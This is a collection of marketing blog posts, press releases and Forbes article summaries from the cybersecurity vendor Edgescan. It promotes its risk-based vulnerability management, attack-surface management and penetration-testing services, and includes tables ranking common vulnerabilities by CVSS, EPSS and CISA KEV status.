Web and API Security Testing.All these technologies utilize a common, extensive data lake and an integrated, intuitive user interface – advancing vulnerability intelligence and simplifying operations and training. The “full stack” intelligence we garner by the combination of these tools is unparalleled in the industry and helps our customers maintain a strong security posture through (once again) continuous visibility. Edgescan’s actionable, risk-rated vulnerability intelligence helps security teams ‘know where to focus first’ and understand exposure details, risk levels and accelerates response times.Watch this platform overview video to learn more about how Edgescan can help your organization modernize its vulnerability management system and achieve continuous visibility and fast remediation, or request a personalized demo here >> ### On-Demand Webinar: How Risk-Based Vulnerability Management Is Redefining Protection Are you struggling to keep up with the never-ending stream of security vulnerabilities and wondering how to effectively allocate your resources? Our recent webinar, featuring industry experts Erik Nost, Jim Manico, and Rahim Jain, addressed the crucial topic of Risk-Based Vulnerability Management (RBVM) and explained why it's a game-changer in cybersecurity. The experts provided valuable insights that can help you better understand RBVM and its benefits.Watch the On-demand Webinar >>Webinar Highlights:Defining RBVM:  The experts demystified RBVM, emphasizing that it's not just about identifying vulnerabilities but understanding their impact on your organization. It's about making informed decisions by considering factors like risk, compensating controls, and potential threats.The Essence of Context:  Erik Nost stressed the importance of context in risk assessment. Knowing about vulnerabilities is not enough; you need to understand how they affect what's most critical for your organization. This contextual approach enables better prioritization and resource allocation.Resource Management:  RBVM allows organizations to allocate resources wisely. It's not just about fixing everything but about making calculated decisions. Sometimes, quick actions, like patching vulnerabilities, are necessary, even without extensive analysis.Balancing Act:  The webinar addressed the balance between data overload and comprehensive information needs. While having more data is beneficial, organizations should balance informed decisions and time-sensitive actions.Collaboration and Openness:  Rahim Jain emphasized the value of community-driven efforts in RBVM. Sharing knowledge and insights within the cybersecurity community can help organizations make more informed decisions and adapt to evolving threats. The million-dollar question: Is Risk-Based Vulnerability Management effective?According to our experts, the answer is a resounding yes. RBVM empowers organizations to:Make informed decisions based on the true impact of vulnerabilities.Prioritize resources for maximum efficiency.Reduce the risk of overlooking critical vulnerabilities.Adapt quickly to emerging threats.While RBVM requires a strategic approach and the right tools, it offers clear benefits in optimizing your organization's security efforts.Although there may be challenges in obtaining comprehensive data and the need for quick decision-making in certain situations, the benefits of Risk-Based Vulnerability Management (RBVM) far outweigh any potential drawbacks. It is a powerful approach for effectively navigating the complex landscape of cybersecurity threats and vulnerabilities.Don't miss out on the full webinar to gain in-depth insights and practical tips on implementing RBVM in your organization. Unlock the full potential of RBVM to enhance your cybersecurity strategy and protect what matters most to your business.Watch the On-demand Webinar >>Discover how RBVM can revolutionize your approach to vulnerability management and strengthen your organization's defenses against cyber threats. ### Forbes Article Summary: Overhyped Tech – What to Keep an Eye On In a world where technological advancements are lauded as the next big thing, it's crucial to separate hype from reality. In a recent article featured on Forbes, members of the Forbes Technology Council weighed in on 19 consumer and business technologies and systems that might need to live up to the hype or may have hidden downsides. Among these experts, Eoin Keary, Founder and CEO of Edgescan, contributed insights into Risk-Based Vulnerability Management (RBVM). The Hype vs. Reality in TechThe tech industry frequently buzzes with excitement over groundbreaking innovations. Artificial Intelligence (AI), Blockchain, and the Metaverse have captured the imaginations of many. However, Eoin Keary reminds us that much of today's AI is based on mathematical algorithms organized into functionality models. While valuable, it falls short of true artificial intelligence. Similarly, despite its potential, Blockchain remains complex, expensive to implement, and lacks trust, standards, and regulations. Risk-Based Vulnerability Management (RBVM)Eoin Keary's expertise in cybersecurity sheds light on a critical aspect of the technology landscape. RBVM, hailed for its effectiveness in prioritizing vulnerabilities, faces a significant challenge—the accuracy of vulnerability discovery. Without precise vulnerability detection, applying risk metadata to false alarms can amplify the problem. Keary emphasizes that effective security solutions begin with accurate input, a fundamental but often overlooked aspect. Edgescan recognizes the importance of precision in vulnerability management in the ever-evolving cybersecurity landscape. It's not just about identifying vulnerabilities; it's about ensuring the identified issues are genuine threats. The Reality of TechIn an era where technology shapes our lives, understanding the actual capabilities and limitations of emerging tech is essential. From Artificial Intelligence to Space Tourism, Forbes Technology Council members offer a reality check on tech's most hyped concepts. Eoin Keary's contribution highlights the critical role of accuracy in vulnerability management. Edgescan continues to lead in delivering precise and effective cybersecurity solutions, emphasizing the importance of true risk prioritization. For the full article and insights from other tech experts, visit Forbes Technology Council's discussion on overhyped technologies. In a world filled with promises, discerning the genuine game-changers from the overhyped is a skill every technology enthusiast should possess.  ### Edgescan: Leading the Charge in Cybersecurity Edgescan has been recognized by two organizations as a key player in external attack surface management and application security testing softwareIn an era where cybersecurity threats are increasing alarmingly, organizations must proactively safeguard their digital assets. Expert Insights and Orbis Research have spotlighted Edgescan's exceptional contributions to cybersecurity, specifically in the areas of External Attack Surface Management (EASM) and Application Security Testing (AST) software solutions.Recognizing Edgescan in the Top 10 External Attack Surface Management Software SolutionsExpert Insights, recognized Edgescan as a prominent player, earning a spot in the "Top 10 External Attack Surface Management Software Solutions." This recognition emphasizes the company's commitment to improving businesses' security posture by identifying and mitigating exposures across their IT ecosystem and internal infrastructure.Edgescan's EASM solution is designed to provide comprehensive visibility into an organization's attack surface, encompassing all the digital assets and potential entry points that attackers can exploit. It goes beyond conventional vulnerability scanning by offering continuous monitoring and real-time insights into vulnerabilities across web applications, APIs, and network infrastructure.One of Edgescan's distinguishing features is its ability to correlate and prioritize risk-based vulnerabilities, allowing organizations to focus on addressing the most critical threats first to ensure a strong security posture is achieved and maintained. This proactive approach is crucial in today's dynamic threat landscape, where cyberattacks constantly evolve.Moreover, Edgescan's EASM solution excels in its capacity to integrate seamlessly with existing security tools and workflows, facilitating a holistic and efficient cybersecurity strategy. Organizations can strengthen their defenses by automating vulnerability discovery and remediation while reducing the manual effort required while improving their security posture.READ POST  >> Acknowledging Edgescan's Contribution to the Global Application Security Testing Software MarketOrbis Research highlighted Edgescan is as a key player in the market, contributing substantially to its growth and development.Organizations that develop or use software applications rely heavily on the AST market to ensure data and infrastructure security. Edgescan's AST solution is   comprehensive, identifying and mitigating vulnerabilities to ensure application security and reliability.Edgescan's application security testing solution utilizes automated scanning, manual testing, and expert analysis to provide in-depth application security coverage. It offers context and remediation guidance beyond mere vulnerability detection, enabling organizations to address vulnerabilities effectively.READ POST >>Edgescan is dedicated to ensuring that your organization's security posture is improved by offering complete and continuous visibility of your global attack surface. Our cybersecurity platform comprises five advanced solutions: External Attack Surface Management, Application Security Testing, Risk-based Vulnerability Management, Penetration Testing as a Service, and API Security Testing. The combination of these solutions helps businesses proactively safeguard themselves against emerging cyber threats. ### Edgescan Garners Two Awards in the 2023 Computing Security Awards Event Edgescan Wins Gold for the Penetration Testing Solution of the Year Award and Receives the Runner-up Position for the Customer Service Award DUBLIN – October 25, 2023 – Edgescan, the first fully integrated cybersecurity platform, announces it has garnered two awards in the 2023 Computing Security Awards event.  Edgescan Penetration Testing as a Service (PTaaS) won the Best Penetration Testing Solution of the Year Award, while its Customer Service organization earned the Runner-up position for the Cyber Security Customer Service Award. Edgescan was won based on the strength of the nomination and a popular vote from members of the cybersecurity community.“Edgescan is honored to be recognized for its trusted and proven PTaaS solution as well as its excellent Customer Service,” states Eoin Keary, Founder and CEO of Edgescan. “Pentesting should be an integral component to any organization’s overall security strategy, and we are confident in enabling our customers’ with more secure, productive environments.”Edgescan Penetration Testing as a Service (PTaaS) offers greater scale, agility, and risk awareness versus traditional onsite pen-testing tools and processes, PTaaS provides organizations of all sizes with the ability to expose and mitigate vulnerabilities without the need for significant human resources, saving time and costs, while maintaining compliance. This enables IT and SecOps teams to focus on enabling and securing their primary business objectives rather than overextending themselves into areas that are not their forte. By employing PTaaS, businesses can accelerate their development and operations, meet compliance mandates, as well as quickly and accurately discover and mitigate security vulnerabilities based on business risk without hindering the productivity of their organization.The Edgescan PTaaS solution utilizes the Edgescan security team’s extensive technical expertise as well as the entire suite of applications within the Edgescan platform to provide vulnerability assessment, exposure validation, and risk ratings. Edgescan security experts offer battle-hardened security experience combined with countless industry accreditations, such as CREST, OSCP, and CEH, to provide clients with deep wisdom and insight to readily resolve their security needs.“This award confirms the excellent Customer Service that Edgescan offers its customers across the globe,”says Brian Heavey, CTO of Edgescan. “We implement industry best practices, combined with continuous enhancement and innovation to support our customers’ every need. As our 95% customer retention rate confirms, their ongoing, effective security is paramount to our success.”Sign up for a demo to learn more about the Edgescan Platform, and our PTaaS solution. About Computing SecurityPublished by BTC, Computing Security magazine is a bimonthly publication bringing our registered readers the latest news, thought leadership, and product reviews relating to IT security. It covers the major cybersecurity issues that businesses encounter as they seek out the best solutions, advice, and strategies to keep their operations safe, productive, and always ahead of the game.About EdgescanEdgescan is an integrated cybersecurity platform that unifies five robust security solutions into a single combative platform. These solutions include External Attack Surface Management (EASM), Risk-based Vulnerability Management (RBVM), Application Security Testing (AST), API Security Testing, and Penetration Testing as a Service (PTaaS). The platform is a hybrid solution that provides automated vulnerability intelligence with validation done by humans – it is what differentiates us from scanning tools providing real and actionable results. The platform reduces the complexity and overhead associated with tool proliferation, cuts operational costs, and delivers risk-rated vulnerability data to speed up remediation, ensuring a strong security posture.Christine CarrigSenior Vice President, Global MarketingEdgescanpr@edgescan.com ### Vulnerability Statistics Snapshot The information presented here gives you an overview of the most recent data extracted from the Edgescan platform, which uses authentic vulnerability intelligence from actual companies. This data will provide you with up-to-date information about the risks in the “wild.” It is a supplement to our Vulnerability Statistics Report, which is released annually in late Winter. Approaches to Vulnerability Prioritization:Comparing EPSS with CVSS v3.0As you may know, not all security vulnerabilities are the same. Some present minimal risk to your infrastructure, while others pose significant risk and can be detrimental to the operations and integrity of your business. Understanding that level of discrepancy amongst vulnerabilities helps make incident response and mitigation more effective while minimizing the headaches brought on by the resolution process. Let’s look at two common methods to estimate the occurrence of significant risk vulnerabilities. The list is based on filtering the top 20 most common vulnerabilities discovered from a total list of 247,000 vulnerabilities by Edgescan between January and September 2023. (See the supporting charts at the end of this article.)Most occurrences of a vulnerability with a minimum CVSS v3.0 score of 8.0;Most occurrences of a vulnerability with a minimum EPSS score of 0.9.The challenge here is precisely how to define “significant risk”. Should it be based on CVSS or EPSS? The result impacts prioritization in all cases.  First, let’s ‘set a clean slate’ by defining these terms:EPSS: The Exploit Prediction Scoring System (EPSS) is a data-driven effort for estimating the likelihood (probability) that a software vulnerability will be exploited in the wild. https://www.first.org/epss/CVSS: The Common Vulnerability Scoring System (CVSS) provides a way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity. https://www.first.org/cvss/Additionally, consider this additional component that indicates those vulnerabilities ‘out in the wild’ of the Internet.CISA KEV: A maintained list by the Cybersecurity and Infrastructure Security Agency (CISA) of vulnerabilities known to be exploited on the Internet: https://www.cisa.gov/known-exploited-vulnerabilities-catalog/Note that estimating the most common occurrence of a vulnerability based on specific risk criteria can result in significant differences depending on the approach to estimating risk. In this case, we compare vulnerabilities using CVSS v3.0 and EPSS attributes. As a result, there is a significant difference in results between using a CVSS and EPSS selection criteria.  Top takeaways;6 of the Top 20 vulnerabilities with a CVSS of 8.0 or above are listed on the CISA KEV (highlighted in the table below in blue); 12 of the Top 20 vulnerabilities with an EPSS of 0.9 or above are listed in the CISA KEV  (highlighted in the table below in blue); EPSS appears to be more aligned with CISA KEV than CVSS based on the sample space used; EPSS covers more than 7,000 vulnerabilities, whilst CISA KEV currently contains 1,000+ vulnerabilities. Overall, a combination of CVSS and EPSS ratings is recommended when attempting to prioritize security vulnerabilities. Introducing threat intelligence mapping to discovered vulnerabilities would also improve pragmatic, laser-focused prioritization. Realize that CVSS v4.0 introduces new attributes, such as threat intelligence which should improve CVSS effectiveness. Realize that context matters when it comes to vulnerability prioritization - as not all vulnerabilities are created equal. It’s the business risk of these vulnerabilities that is most important.Besides these industry-established risk-rating systems, Edgescan also delivers validated vulnerability data and quickly rates the severity level of each exposure using a proprietary scoring process called EVSS (Edgescan Validated Security Score). This is a key component of our Risk-based Vulnerability Management (RBVM) solution, which uses automation combined with human intelligence to uniquely test for vulnerabilities that cannot be uncovered through traditional vulnerability scanning alone. Based on this recent snapshot of information, I’d encourage you to consider this to optimize your vulnerability management program – and reduce any headaches in your remediation process. For more information on how Edgescan can help your organization reduce risk from vulnerabilities and exposures, sign up for a demo to see how it all works.Table 1. Top 20 most common vulnerabilities discovered on public Internet-facing systems with a CVSS v3.0 score of 8.0+ Vulnerability  CVSS v3.0  EPSS  CISA KEV  1  WordPress Advanced Custom Fields Pro Plugin 5.x < 5.12.3 File Upload Vulnerability  8.8  0  false  2  Wowza Streaming Engine < 4.8.17 Multiple Log4j Vulnerabilities (Log4Shell)  10  0.97  true  3  Microsoft Exchange Server OWA Multiple Vulnerabilities (Sep 2022, ProxyNotShell)   8.8  0.97  true  4  Wowza Streaming Engine <= 4.8.0 Multiple Vulnerabilities  8.8  0.01  false  5  Wowza Streaming Engine <= 4.8.11+5 Multiple Vulnerabilities  8.1  0  false  6  Spring4Shell  9.8  0.97  true  7  PHP < 7.4.30, 8.0.x < 8.0.20, 8.1.x < 8.1.7 Security Update (Jun 2022) - Linux  8.8  0  false  8  Microsoft Exchange Server 2013 / 2016 / 2019 Multiple Vulnerabilities (KB5007409)   8.8  0.93  true  9  Magento 2.3.3-p1 <= 2.3.7-p2, 2.4.x <= 2.4.3-p1 Multiple RCE Vulnerabilities (APSB22-12)  9.8  0.26  true  10  Microsoft Exchange Server 2016 / 2019 Multiple Vulnerabilities (KB5012698)   8.8  0.02  false  11  Magento < 2.3.6-p1, 2.4.x < 2.4.1-p1 Multiple Vulnerabilities (APSB21-08)  9.1  0.01  false  12  Microsoft Exchange Server 2016 / 2019 Multiple Vulnerabilities (KB5007012)  9  0  false  13  Microsoft Exchange Server 2013 / 2016 / 2019 Multiple Vulnerabilities (KB5008631)  9  0  false  14  Magento < 2.3.7-p3, 2.4.x < 2.4.3-p2 RCE Vulnerability (APSB22-13)  8.3  0  false  15  Magento < 2.3.7-p1, 2.4.x < 2.4.2-p2 Multiple Vulnerabilities (ASPB21-64)  9.8  0  false  16  Microsoft Exchange Server 2016 / 2019 Multiple Vulnerabilities (KB5015322)  8  0  false  17  PHP < 7.4.28, 8.0.x < 8.0.16, 8.1.x < 8.1.3 Security Update (Feb 2022) - Windows  9.8  0  false  18  Apache HTTP Server 2.4.7 - 2.4.51 Multiple Vulnerabilities - Windows  8.2  0.75  false  19  SAP Multiple Products Request Smuggling and Request Concatenation Vulnerability (ICMAD, 3123396  10  0.96  true  20  Ipswitch WS_FTP Server < 8.6.1 Multiple Vulnerabilities  9.8  0.01  false   Table 2. Top 20 most common vulnerabilities discovered on public Internet-facing systems with an EPSS score of 0.9+  Vulnerability  CVSS v3.0  EPSS  CISA KEV  1  SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (LogJam)  3.7  0.97  false  2  SSL/TLS: Weak Cipher Suites  5.9  0.97  false  3  SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE)  3.4  0.98  false  4  OpenSSL 'ChangeCipherSpec' MiTM Vulnerability  7.4  0.97  false  5  Wowza Streaming Engine < 4.8.17 Multiple Log4j Vulnerabilities (Log4Shell)  10  0.97  true  6  Microsoft Exchange Server OWA Multiple Vulnerabilities (Sep 2022, ProxyNotShell)  8.8  0.97  true  7  OpenSSL 'CVE-2016-2107' Padding Oracle Vulnerability  5.9  0.97  false  8  Spring4Shell  9.8  0.97  true  9  Microsoft Exchange Server 2013 / 2016 / 2019 Multiple Vulnerabilities (KB5007409)  8.8  0.93  true  10  SAP Multiple Products Request Smuggling and Request Concatenation Vulnerability (ICMAD, 3123396)  10  0.96  true  11  Log4Shell (CVE-2021-44228)  10  0.97  true  12  ManageEngine ADSelfService Plus < 6.1 build 6122 Remote Code Execution  6.8  0.95  true  13  Cisco Adaptive Security Appliance Software Web Services Interface Cross-Site Scripting Vulnerabilities (cisco-sa-asaftd-xss-multiple-FCB3vPZe)  6.1  0.97  true  14  Apache Axis <= 1.4 Multiple Vulnerabilities  7.5  0.96  false  15  SSL/TLS EXPORT_RSA <= 512-bit Cipher Suites Supported (FREAK)  4.3  0.97  false  16  Oracle Access Manager (OAM) RCE Vulnerability (cpujan2022)  9.8  0.96  true  17  WordPress Multiple Vulnerabilities (Jan 2022) - Linux  8.8  0.94  false  18  SAP NetWeaver AS Java Multiple Vulnerabilities (2934135)  10  0.97  true  19  MobileIron Core Multiple Log4j Vulnerabilities (Log4Shell)  10  0.97  true  20  MobileIron Sentry Log4j RCE Vulnerability (Log4Shell)  10  0.97  true  ### Press Release: Erik Nost, Senior Analyst, and Edgescan Executives to Discuss the Benefits of a Risk-Based Vulnerability Management Solution Guest speaker Erik Nost, Senior Analyst, and Edgescan Executives to Discuss the Benefits of a Risk-Based Vulnerability Management Solution in a Webinar on October 5thDUBLIN – September 28, 2023 – Edgescan, the first fully-integrated cybersecurity platform, announced today an upcoming webinar on Thursday, October 5 at 11:00 AM ET featuring Forrester that discusses risk-based vulnerability management solutions and how they enable a modern, proactive security strategy.Guest speaker, Forrester Senior Analyst, Erik Nost, joins Edgescan Executives, Eoin Keary (CEO and Founder, Edgescan) and Jim Manico (Founder, Manicode Security, and Edgescan Strategic Technical Advisor) to discuss the fundamental tools and processes that organizations must employ in their security strategy for continuous assessment and effective risk management.Forrester Senior Analyst Erik Nost starts the webinar by sharing his views on the advantages of implementing a proactive approach to security. This will be followed by a moderated panel discussion covering topics such as the benefits of risk-based vulnerability management, the advantages and disadvantages of modern cybersecurity platforms, and the critical components required to establish a proactive security strategy that promotes a robust security posture.“Legacy scanners, using just CVSS scores, produce a tremendous number of false alarms as the vulnerabilities are simply not used in cyber breaches. We need to fix the issues that matter with our limited resources. Accuracy is vital to have a clean prioritization list.” says Eoin Keary, CEO and founder of Edgescan.To register for the webinar on October 5th at 11:00 AM ET, and for full event details, please visit: https://info.edgescan.com/forrester-webinar-proactive-security-and-rbvmAbout EdgescanEdgescan is an integrated cybersecurity platform that unifies five robust security solutions into a single combative platform. These solutions include External Attack Surface Management (EASM), Risk-based Vulnerability Management (RBVM), Application Security Testing (AST), API Security Testing, and Penetration Testing as a Service (PTaaS). The platform is a hybrid solution that provides automated vulnerability intelligence with validation done by humans – it is what differentiates us from scanning tools, providing real and actionable results. The platform reduces the complexity and overhead associated with tool proliferation, cuts operational costs, and delivers risk-rated vulnerability data to speed up remediation, ensuring a strong security posture.Christine CarrigSenior Vice President, Global MarketingEdgescanpr@edgescan.com ### Don’t Be in Denial: Discover the Improvements a Risk-based VM Program Will Deliver Risk-Based Vulnerability Management (RBVM) prioritizes remediation efforts based on the potential impact in a particular environment, and the likelihood of exploitation. Knowing which vulnerabilities pose the greatest risk empowers security teams to allocate resources more effectively and improve their overall security posture. So, this leads us to the data used to rate that risk and one of the most utilized is the framework Common Vulnerability Scoring System (CVSS). But can this framework be the only reference needed? Why not keep using CVSS as the main framework to evaluate risk in vulnerabilities? Imagine the Nile River, with its many tributaries and streams pouring towards the Mediterranean, creating a powerful current cutting through East Africa. It seems efficient because all the water is channeled into one path, except during the spring and summer months when the Nile Basin fills with rainwater. The banks of the river swell with rain, which changes the direction and flow of water locally. Prolific flooding occurs upstream, and droughts occur downstream.   When it Comes to Risk Prioritization Context Matters If every vulnerability was only assessed for risk using one framework, there would be an overflow of resources and attention in certain areas. Numerous factors influence the risk rating of a given vulnerability. If all those factors flow into a single framework, the CVSS river, then it causes flooding and droughts by creating gaps in coverage and diminishing security testing accuracy. Everyone uses CVSS, it’s been trusted for almost 20 years, but the problem with using CVSS alone is the fact that it fails to describe context. For example, only 5% of all vulnerabilities are exploited in the wild. 2 Edgescan rates the severity of each vulnerability using a proprietary scoring process called EVSS (Edgescan Validated Security Score), in addition the Platform uses CVSS, EPSS (Exploit Prediction Scoring System), CISA KEV (CISA Known Exploited Vulnerability) and the OWASP Top Ten. The Edgescan platform also allows users to edit or accept risk for any individual vulnerability, further customizing the EVSS to prioritize your scanning results.   Map and Monitor Your Global Attack Surface Discovery is the first step to securing your assets using RBVM. Now more than ever, organizations are struggling to keep up with a dynamic, ever-expanding attack surface. That’s why according to Forbes “the most common reason organizations struggle to succeed with Risk-based VM is that they don't know the span of their asset environment… Simply put, you can't protect something you don't know exists.”1 Without knowing the topography of the Nile River Valley, you can’t tell what will be flooded and what will become arid. Without knowing the attack surface of your enterprise, you can’t properly assess risk posture, because not every asset is being scanned. Edgescan’s external attack surface management solution (EASM) inventories, monitors, and manages corporate assets across disparate environments, providing a view of your entire digital estate. After mapping out your attack surface, any discovered assets can be automatically put into a scanning cadence where it will be assessed and discovered vulnerabilities risk rated. It's also important to note that “a new Risk-based VM solution is probably not your organization's first investment toward vulnerability management.”1  Organizations that know the pain of using old-school vulnerability scanners tend to see the most value from Risk-based VM. Legacy scanners can produce a significant number of false positives, particularly if they are incorrectly configured. False positives reported during security testing with a high CVSS score will cause panic to rip through your SOC, only to discover it poses no threat at all. False positives, regardless of CVSS score, deplete resources that could be spent mitigating REAL risk.   Verified Results = No False Positives Edgescan guarantees no false positives with our unique hybrid approach (using cyber analytics and expertise combined), ensuring that results are always real and actionable. Edgescan’s CEO and Founder, Eoin Keary and AppSec Guru Jim Manico go into more detail about RBVM in this recent podcast: Edgescan War Room - Episode 3 or visit our Risk-based VM solutions page to learn more. You won’t want to be in denial (DeNile) when it comes to the improvements Risk-based VM can make to your cybersecurity management program and improving you security posture.   Reference: 1. Five Best Practices to Succeed At Risk-Based Vulnerability Management 2. The EPSS Model  ### Forbes Article Summary: Debunking AI Myths: Separating Fact from Fiction As the world increasingly adopts and integrates artificial intelligence (AI) into various aspects of daily life, a multitude of perceptions about AI have emerged, ranging from excitement to skepticism. However, it's essential to distinguish between fact and fiction regarding AI. In a recent article by Forbes Technology Council members, several myths surrounding AI are debunked, shedding light on the reality of this technology.Eoin Keary, Founder and CEO of Edgescan weighs in on the importance of context in AI. He emphasizes that despite its capabilities, AI is currently limited in understanding context, a factor crucial for making everyday decisions. This limitation extends from business to cybersecurity applications. Eoin points out that AI tools are trained for specific tasks, lacking the depth of contextual comprehension that human decision-making entails.The Forbes Technology Council article aims to dispel these myths to foster a more accurate understanding of AI's capabilities and limitations. The broader message underscores the importance of using AI where it excels while being cautious about relying on it for decision-making that requires context.AI tools lack the depth of contextual comprehension that human decision-making entailsEdgescan's alignment with the article's perspective becomes evident. The company's commitment to cybersecurity solutions acknowledges the value of AI in certain applications while emphasizing the significance of human expertise in understanding contextual nuances and making crucial decisions.Edgescan is committed to providing comprehensive cybersecurity solutions. The company recognizes that effective security strategies demand proactive risk management and the strategic allocation of resources. Businesses can enhance their preparedness against ransomware attacks and other cybersecurity challenges by applying a risk-based approach to security countermeasures. Edgescan’s comprehensive approach to cybersecurity, encompassing risk-based vulnerability management, penetration testing, and attack surface management, underscores the company’s commitment to providing effective solutions for today’s cybersecurity challenges.Full article is available online at Forbes >>Check out our 10-minute video demo to learn more about the platform >> ### Cybersecurity Management in Threes Cybersecurity Management in Threes: Cybersecurity pitfalls, Components of a Successful Cybersecurity Program, and a Three-step Approach to a Strong Security Posture As the cybersecurity industry continues to evolve to address more and different threat vectors, the type of solutions needed to effectively secure enterprises are also evolving. While some of these new solutions are intriguing (e.g., machine learning, AI, generative AI, etc.) many are still unproven and require more real-world testing and deployment to become mainstream. While new products and technologies garner a lot of talk and interest, (check out these videos >) there are still some fundamental tools and processes that must be utilized in any enterprise security strategy for risk management.   That brings me to be somewhat retrospective by (re)asking my company ‘why we do what we do’. Why and how do we at Edgescan follow our unique approach to protecting our customers’ assets? Let me address these questions using a common format, based on three relevant key points.     Three Cybersecurity Pitfalls:   1 - Vulnerability Scanning Alone is Insufficient Don’t get me wrong, vulnerability management (VM) is a necessary tool in any enterprise security toolbox BUT, alone, it’s not enough. Testing systems for vulnerabilities is mandatory but realize there may be bugs or weaknesses in both the target system and in the scanner itself, which may result in false negatives and false positives. And I’m sure you can attest to the growing challenge and frustration in chasing down false alarms.   2 - A Siloed Approach to Vulnerability Management Does Not Work While splitting VM into silos based on network and application vulnerability intelligence may be convenient for some enterprise security teams, it is not a logical or efficient approach in the end. Foremost, effective enterprise cybersecurity management requires full stack visibility because hackers will use any and all attack vectors to penetrate your organization.  Hackers really don’t care where in the stack a vulnerability is if they breach successfully. Uncovering blind spots and understanding their associated risk based upon the business context, as well as maintaining a thorough knowledge of your evolving attack surface is imperative to a solid cyber security program.  Undoubtedly, receiving feeds of accurate and triaged vulnerability intelligence expedites decision-making and, ultimately, vulnerability mitigation. Prioritization is simplified by answering questions like "Which vulnerabilities should we fix now?" Our "noise suppression" capability provides custom risk ratings & breach predictability and eliminates false positives to help organizations be faster and more effective.   3 - Traditional Penetration Testing is Antiquated Traditional penetration testing is not scalable and it is expensive, slow, requires contracts, and results in a ‘clunky’ PDF report as the primary output. I could elaborate, but I think you get – and know - the point.     Three Components of a Successful Cybersecurity Program 1 - Third-party Tool Integration is Essential Edgescan provides an extensible platform that integrates into numerous third-party tools like Vulnerability Management scanners, ticketing systems, reporting applications, GRC tools, and more for complete visibility and monitoring. Supplying these tools with validated, accurate vulnerability data on demand and over time is tremendously beneficial to SecOps and DevOps teams alike for auditing and trend analysis. You can also sync IP and hostnames from your cloud environment and the platform will auto-enroll addresses for EASM (External Attack Surface Management), vulnerability management or penetration testing as a service (PTaaS) - we call this “Cloudhook.” Cloudhook is Edgescan’s native cloud plugin which keeps pace with the constant state of flux associated with cloud-based deployments.   2 - Adjacent Technologies as Part of an Effective Security Strategy The Edgescan Platform goes far beyond vulnerability management (VM) and penetration testing to include application, web application, and API security, as well as external attack surface management (EASM) capabilities. Following our key philosophy of “you can't secure what you can't see” in pursuit of providing continuous assessment and resilience, we offer multiple tools to secure the systems and applications being used in enterprises today, as well as addressing how to best identify and mitigate evolving threat vectors. I recommend assessing how effective your current tools are at sharing vulnerability intelligence data to ‘see and secure’ your own infrastructure.   3 - Expert Technical Support is Mandatory We don't expect our clients to be cyber security management experts, so everyone in the Edgescan support team is a seasoned security expert and penetration tester. And, in order to understand and have a comprehensive view of our systems and workflows, each security analyst periodically rotates between Edgescan support and consultancy, advisory, and software security departments. Our security pros also carry a range of industry credentials including CREST, OSCP and CEH certifications. This ensures our “human element” is as knowledgeable and effective in understanding and securing your organization.   The Edgescan Three-step Approach to Effective Cybersecurity Management     Step 1. External Attack Surface Management (EASM) A Strong Security Posture Begins with Knowing Your Attack Surface Issues revealed: What is exposed? What can be potentially hacked? The first step in achieving a strong security posture is to accurately map, measure, then inventory your entire attack surface, including cloud services, hosts, network devices, web apps, APIs and more – you simply can’t secure what you can’t measure or see. Edgescan’s External Attack Surface Management (EASM) provides immediate visibility of an enterprise’s internet-facing estate and then continuously monitors the attack surface as it evolves and changes. It provides complete visibility and the flexibility for organizations to modify their change and deployment models whenever needed. With EASM you’ll discover and inventory subdomains and find related or obfuscated records that may direct an attacker to your internet footprint. Edgescan’s EASM also includes continuous profiling and API discovery, a unique way to detect shadow APIs in real-time, limiting cyber threats   Step 2. Risk-based Vulnerability Management Go Beyond “Just Discovering” Vulnerabilities Issues revealed: What weaknesses and exposures do we have? What level of threat are they to the business? Once you have scoured your attack surface for weakness you need to continuously monitor and detect all vulnerabilities and exposures across the full stack with high accuracy (Validation is King). Then rank the vulnerabilities by business concerns and tightly integrate with support operations to ensure timely remediation on what matters most. Accurate Vulnerability Intelligence: Edgescan provides a hybrid approach to VM (analyst firms are calling it risk-based vulnerability management or RBVM) using a combination of automation to discover most vulnerabilities at scale, and cyber analytics coupled with human intervention to validate and triage unknown or more complex vulnerabilities. Our goal is to ensure we have no false positives and that discovered issues are risk rated. Full-stack Coverage: The human element of the Edgescan solution ensures assessments are getting the coverage they need, and clients will not receive false positive alerts. As 100% coverage in system and software testing is extremely hard to achieve due to following countless logical flows of code in applications, the challenge increases as different technologies exist that require different types of automation, whether they are APIs, JavaScript-heavy frameworks, cloud apps, or generic n-tier applications.   Step 3. Penetration Testing as a Service Unique hybrid approach that delivers verified Risk-rated Results Issues revealed: How can a skilled attacker penetrate your environment? Now that your security team is armed with EASM and RBVM intelligence, perform laser-focused resilience tests on 1) areas of concern; 2) complex areas not suited for automated scanning. Edgescan delivers Penetration Testing as a Service (PTaaS) to help organizations better manage risk, mitigate data breaches, maintain compliance, and increase safe business continuity. Our PTaaS utilizes the same user interface as our RBVM solution as well as using the same intelligence data. This integrated solution provides the ability to easily retest mitigated vulnerabilities on demand or via automation, while not waiting on a consultant to execute any tests. Our PTaaS experts are OSCP, CEH & CREST certified and deliver the rigor expected of any leading penetration test. PTaaS focuses on testing sensitive areas of an asset for vulnerabilities that cannot be uncovered through traditional vulnerability scanning & automation alone. This hybrid process of automation and combined human intelligence is what differentiates us from scanning tools and legacy services providing real and actionable results.  I encourage you to also be retrospective and reconsider the effectiveness of your organization’s security tools in protecting your critical assets and data. Perhaps you can also take three steps to better fortify your own organization. To better understand how Edgescan can help protect your environment contact, click here. ### Forbes Article Summary: Prioritizing Systems and Data: Cybersecurity Resilience Against Ransomware Forbes Article Summary: Prioritizing Systems and Data: Cybersecurity Resilience Against Ransomware In the rapidly evolving landscape of cybersecurity threats, ransomware attacks have become a significant concern for organizations of all sizes. Despite the high-profile incidents making headlines, no entity should consider itself immune to this menace.   Forbes Technology Council members were invited to share thoughts on specific subjects and collectively they have shared a range of essential considerations to help businesses prepare for and respond effectively to potential ransomware attacks.  Among these insights, Eoin Keary, Co-Founder and CEO of Edgescan, emphasizes the crucial practice of prioritizing systems and data in terms of their operational significance. He advocates categorizing the organization's systems and data while applying additional security measures to fortify critical assets. In this dynamic environment, where threats are persistent and ever-evolving, the importance of resilience. Implementing layers of controls around vital systems and data can minimize the impact of breaches and ensure robust security.  Edgescan is committed to providing comprehensive Cybersecurity Solutions. The company recognizes that effective security strategies demand proactive risk management and the strategic allocation of resources. Businesses can enhance their preparedness against ransomware attacks and other cybersecurity challenges by applying a risk-based approach to security countermeasures. Edgescan's comprehensive approach to cybersecurity, encompassing risk-based vulnerability 